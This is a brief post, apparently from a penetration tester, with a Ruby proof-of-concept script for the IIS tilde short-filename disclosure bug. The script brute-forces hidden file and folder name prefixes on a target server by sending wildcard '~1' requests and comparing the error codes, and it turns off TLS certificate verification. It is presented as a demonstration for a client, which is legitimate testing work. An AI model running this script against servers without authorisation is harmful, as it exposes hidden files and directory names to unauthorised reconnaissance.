During a pentest, i need to show the iis tidle bug to a customer as prove. so i code a simple ruby script for them.
#!/usr/bin/env ruby
# iistidlebugpoc.rb
# quick poc script for ms iis tidle bug
require 'rubygems'
require 'mechanize'
require 'optparse'
STDOUT.sync = true
@agent = Mechanize.new
#@agent.ssl_version = 'SSLv3'
@agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
@options = {}
OptionParser.new do |opts|
opts.banner = "Usage: example.rb [options]"
opts.on('-u', '--url url', 'https://example.com/') do |url|
@options[:url] = url
end
opts.on('-v', '--verbose', 'enable debug output') do
@options[:verbose] = true
end
opts.on('-e', '--errcode errcode', 'define error code') do |errcode|
@options[:errcode] = errcode
end
opts.on('-h', '--help', 'help?') do
puts opts
exit
end
opts.parse!
end
if @options[:errcode].nil?
@options[:errcode] = "404"
end
def send_req(data)
begin
url = @options[:url] + "#{data}"
@agent.get(url)
rescue Mechanize::ResponseCodeError => e
return e.response_code
end
end
def chk_char(str)
if @options[:errcode] == send_req(str + "*~1*/.aspx")
print "------"
print "\r#{str}\n"
return str
else
return nil
end
end
def chk_file(list)
data = Array.new()
list.each do |str|
mychar = "qazwsxedcrfvtgbyhnujmikolp1627384950_- ."
mychar.each_char do |chr|
if (res = chk_char(str + chr)).nil?
else
#puts "char : #{res}"
data.push(res)
end
end
end
return data
end
i = 0
data = Array.new()
data.push('')
puts "Bruteforce filename..please wait"
puts "Error Code : #{@options[:errcode]}"
while (i < 5)
a = chk_file(data)
data = a
i += 1
end
